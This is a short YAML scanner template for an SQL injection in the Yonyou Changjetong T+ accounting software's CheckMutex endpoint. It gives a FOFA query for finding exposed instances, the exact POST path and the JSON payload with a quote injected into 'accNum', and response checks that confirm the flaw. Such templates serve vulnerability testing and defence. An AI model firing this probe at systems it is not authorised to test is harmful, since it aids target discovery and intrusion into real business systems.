product: 用友畅捷通-TPlus
vName: 用友畅捷通-TPlus CheckMutex - SQL Injection
type: SQL注入
vID: [ ]
level: 3
vDesc: There is an SQL injection vulnerability in the Changjetcrm financial crm system under Yonyou.
version: ''
note: ''
search:
  FOFA: app="畅捷通-TPlus"
protocol: http
link: https://github.com/MrWQ/vulnerability-paper/blob/7551f7584bd35039028b1d9473a00201ed18e6b2/bugs/【漏洞复现】用友畅捷通 T+ SQL 注入漏洞.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      path: /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex
      method: post
      json: { "accNum": "3'", "functionTag": "SYS0104", "url": "" }
    verify:
      logic: and
      check:
        - body:
            value:
              - order by begintime
              - '{"value":"'
            logic: and
          header:
            value:
              - text/plain
            logic: and
          status: 200
